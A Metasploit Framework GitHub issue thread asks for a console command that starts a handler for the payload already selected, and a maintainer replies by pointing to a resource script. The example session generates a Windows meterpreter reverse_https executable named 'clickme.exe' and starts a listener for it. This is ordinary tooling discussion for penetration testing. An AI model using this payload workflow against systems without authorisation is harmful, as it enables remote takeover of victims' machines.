### ISSUE TITLE
Easily spawn handler for current payload module in msfconsole.

### ISSUE THREAD

**Issue by todb-r7** [rapid7/metasploit-framework#3856]
*This issue was [RM8825](https://dev.metasploit.com/redmine/issues/8825), originally filed by @scriptjunkie*

I frequently find myself in the following situation:

  - Metasploit console (or gui or something else with a console) is up
  - I want to generate a payload to distribute via exe/vbs/etc. or I'm developing/testing a payload, so
  - I run "use payload/foo/bar" "set LHOST 1.2.3.4" ... "generate -t ..."
  - I need to start a handler for that exact payload because I'm about to run the one I just generated

It would be really nice to have a "start_handler" or probably just "handle" command in the console interface that will spawn a multi/handler with the payload and options I have already selected. I'm flagging to @jlee-r7 since I know he's touched this code in the past. Thanks.

Ideal:

````
msf > use payload/windows/meterpreter/reverse_https
msf payload(reverse_https) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf payload(reverse_https) > generate -t exe -f /tmp/clickme.exe
[*] Writing 73802 bytes to /tmp/clickme.exe...
msf payload(reverse_https) > handle
[*] Starting handler for windows/meterpreter/reverse_https on 192.168.56.1:8443
````

**Comment by wchen-r7** [comment]
Mubix suggested pretty much the same thing awhile ago, and this is our solution for that:
https://github.com/rapid7/metasploit-framework/blob/master/scripts/resource/auto_win32_multihandler.rc

If you want, you can create an alias that runs this:

```
./msfconsole -q -r scripts/resource/auto_win32_multihandler.rc
```

If you don't like the above, please either create another issue for enhancement, or maybe reopen this ticket. Thanks.
